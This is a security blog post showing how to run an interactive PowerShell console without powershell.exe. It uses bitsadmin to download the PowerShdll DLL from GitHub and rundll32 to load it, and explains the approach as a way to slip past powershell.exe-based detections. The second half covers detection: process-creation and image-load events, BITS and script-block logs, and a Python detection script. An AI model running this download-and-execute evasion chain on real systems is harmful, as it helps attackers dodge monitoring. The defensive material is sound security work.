Utilize PowerShell without executing the powershell.exe binary – All things in moderation

Utilize PowerShell without executing the powershell.exe binary

Recently I have been learning about techniques used in developing modern malware. One of them is to utilize PowerShell without ever executing the powershell.exe binary. After reading about it, I decided to try it out with PowerShdll.

1. PowerShdll:

This DLL was created by p3nt4 and allows you to execute PowerShell scripts, commands, encoded commands, and even an interactive shell, all hosted inside whatever process loads the DLL. So I could download it onto a box, load it, and boom, I have PowerShell without PowerShell. Then I thought, why not take it a step further? From an adversary’s perspective, and for this particular scenario, the goal is to execute PowerShell scripts or commands without triggering the detections that are typically built around powershell.exe.

Taking it a step further, I wanted to start from the classic command prompt. I could have reached for another toolset immediately, but I like using Living Off the Land techniques (mentioned in a previous article). With access to the command prompt, I need a way to get PowerShdll onto the system. Fortunately, Microsoft Windows ships plenty of signed binaries that incorporate some form of download functionality.

bitsadmin /transfer test /priority high https://github.com/p3nt4/PowerShdll/blob/master/dll/bin/x64/Release/PowerShdll.dll?raw=true C:\Users\User\Downloads\test.dll

The command above tells bitsadmin to create a transfer job with the display name “test” at high priority, download PowerShdll.dll from the GitHub repository (the ?raw=true query string makes GitHub serve the file itself rather than the HTML page around it), and write it to the local system as test.dll. /transfer creates the job, runs it, and waits for it to complete, so when the prompt returns the file is on disk. Note that the job name and the remote URL are recorded by the BITS client, which matters for the defensive section below.

Now that we have the target dll downloaded, we need a way to invoke it.

Enter: rundll32.exe

Rundll32 loads a DLL and calls one of its exported functions. It can only load DLLs of its own bitness: the 64-bit rundll32.exe in System32 loads 64-bit DLLs (which is why the x64 build of PowerShdll was downloaded above), while the 32-bit copy in SysWOW64 loads 32-bit DLLs. Based on the options available in PowerShdll, we want to start an interactive console. According to the options listed on the PowerShdll repo, we can use -w (interactive console in a new window) or -i (interactive console within the current console).

Here is the command that we’re going to use:

Rundll32 test.dll,main -w

The “main” portion of the command names the exported function inside the DLL that rundll32 will call; everything after it (-w) is passed to that export as its command line. The command assumes you are in C:\Users\User\Downloads, where bitsadmin wrote the file; otherwise give the full path to test.dll.

After the command executes successfully, a new window opens up with an interactive PowerShell console…without invoking the actual PowerShell.exe binary.

When viewing the process tree in Process Hacker, the interactive console is hosted by rundll32.exe itself, running under cmd.exe, with no powershell.exe anywhere in the tree:

We’ve achieved our objectives of using a LoLBin for download capability and another for executing PowerShell without the PowerShell binary.

Now to turn the table around and look at it from a defensive perspective.

2. How to detect this:

In order to detect this at the earliest part of the execution chain, we should start with the bitsadmin process. Examples:

• Event ID 4688 (A New Process Has Been Created)…this assumes that Audit Process Creation is enabled, that “Include command line in process creation events” is turned on so the URL and target path are captured, and that your host logs are being forwarded to some sort of security monitoring system. Sysmon Event ID 1 (Process Create) gives you the same data with the command line included by default.
• The Microsoft-Windows-Bits-Client/Operational log on the host records the job creation along with the remote URL.
• If you employ a network monitoring capability, you should notice the BITS user agent string (Microsoft BITS/<version>), provided your monitoring point sees the HTTP headers (plain HTTP or a TLS-inspecting proxy).

If you’re attempting to detect the use of PowerShell without the PowerShell binary:

• One method is to look for System.Management.Automation.dll (the PowerShell engine) being loaded into a process other than powershell.exe, powershell_ise.exe or pwsh.exe. Sysmon Event ID 7 (Image loaded) records exactly this, with the loading process and the loaded DLL.
• Because script block logging is implemented inside the engine rather than in powershell.exe, Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log is still written when that logging is enabled, whatever the host process is.
• If you’re looking at the host locally, you can view the threads and DLLs loaded by rundll32, or any other process, in Process Hacker.
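The following is an added example, not code from the original post or from the PowerShdll project. It runs the three detections above over a handful of constructed records: process-creation and image-load events shaped like Sysmon Event ID 1 and Event ID 7 (the field names Image, ParentImage, CommandLine and ImageLoaded follow Sysmon; everything else is assumed), plus two invented proxy log lines. The rules are the ones described in this section: bitsadmin /transfer with a URL on the command line, the PowerShell engine DLL loaded into a host that is not one of the normal PowerShell hosts, and the BITS user agent on the wire.

```python
import re
from pathlib import PureWindowsPath
from urllib.parse import urlparse

# Processes that are expected to load the PowerShell engine. Anything else
# loading System.Management.Automation.dll is "PowerShell without PowerShell".
EXPECTED_PS_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
PS_ENGINE_DLL = "system.management.automation.dll"
BITS_UA = re.compile(r'"Microsoft BITS/[\d.]+"')
URL_RE = re.compile(r"https?://\S+")

# Constructed sample events (not real captures); field names modeled on Sysmon.
GAC_PS_ENGINE = (r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation"
                 r"\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bitsadmin /transfer test /priority high "
                    "https://github.com/p3nt4/PowerShdll/blob/master/dll/bin/x64/Release/PowerShdll.dll?raw=true "
                    r"C:\Users\User\Downloads\test.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "Rundll32 test.dll,main -w"},
    # The engine loaded into rundll32: this is the PowerShdll console.
    {"EventID": 7, "Image": r"C:\Windows\System32\rundll32.exe", "ImageLoaded": GAC_PS_ENGINE},
    # Benign: the engine loaded into the real PowerShell host.
    {"EventID": 7, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": GAC_PS_ENGINE},
]
# Constructed proxy log lines (timestamp, client, method, URL, user agent).
SAMPLE_PROXY_LINES = [
    '2021-03-01T10:02:11Z 10.0.0.5 GET https://github.com/p3nt4/PowerShdll/blob/master/'
    'dll/bin/x64/Release/PowerShdll.dll?raw=true "Microsoft BITS/7.8"',
    '2021-03-01T10:02:15Z 10.0.0.5 GET https://www.example.com/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]


def basename(path):
    """Lower-cased file name of a Windows path, e.g. 'bitsadmin.exe'."""
    return PureWindowsPath(path).name.lower()


def detect_bits_download(event):
    """Stage 1: bitsadmin used as a downloader (4688 / Sysmon EID 1 with command line)."""
    if event.get("EventID") != 1 or basename(event["Image"]) != "bitsadmin.exe":
        return None
    cmd = event.get("CommandLine", "")
    url = URL_RE.search(cmd)
    if "/transfer" in cmd.lower() and url:
        return f"bitsadmin download from {urlparse(url.group()).netloc}"
    return None


def detect_unexpected_ps_host(event):
    """Stage 2: PowerShell engine loaded into a non-PowerShell process (Sysmon EID 7)."""
    if event.get("EventID") != 7 or basename(event["ImageLoaded"]) != PS_ENGINE_DLL:
        return None
    host = basename(event["Image"])
    if host in EXPECTED_PS_HOSTS:
        return None
    return f"{host} loaded System.Management.Automation.dll"


def detect_bits_user_agent(proxy_line):
    """Network side: BITS identifies itself in the User-Agent header."""
    return BITS_UA.search(proxy_line) is not None


def run_detections(events, proxy_lines):
    """Apply every rule and return the alert strings in the order the records were seen."""
    alerts = []
    for ev in events:
        for detector in (detect_bits_download, detect_unexpected_ps_host):
            hit = detector(ev)
            if hit:
                alerts.append(hit)
    for line in proxy_lines:
        if detect_bits_user_agent(line):
            url = URL_RE.search(line)
            alerts.append(f"BITS user agent fetching {url.group() if url else '<unknown>'}")
    return alerts


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS, SAMPLE_PROXY_LINES):
        print(alert)
```

On the sample data this produces three alerts: the bitsadmin download from github.com, rundll32.exe loading the engine, and the BITS user agent on the proxy. The image-load rule is the one that generalises: it fires for any host that is not a known PowerShell executable, not just rundll32, which is what you want since PowerShdll (and similar DLL hosts) can be loaded by regsvr32, installutil or a custom binary just as easily. The user-agent rule will only ever see something if the monitoring point has the HTTP headers, as noted above.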

Example:

In this example, I’ve searched the modules loaded by rundll32.exe in Process Hacker for System.Management.Automation.dll, which is present while the PowerShdll console is open:

For comparison, here’s what it looks like once the process has exited and the DLL is no longer loaded:

Conclusion:

So, after experimenting with PowerShell without PowerShell, we can see that it’s pretty effective. Another thing to note is that if you’re not properly monitoring LoLBins for malicious activity, you could be missing quite a bit. While these types of techniques are widely used, there are ways to detect them (process creation with command lines, image loads, BITS client and PowerShell engine logs, and the BITS user agent on the network) and, where possible, to restrict the use of LoLBins.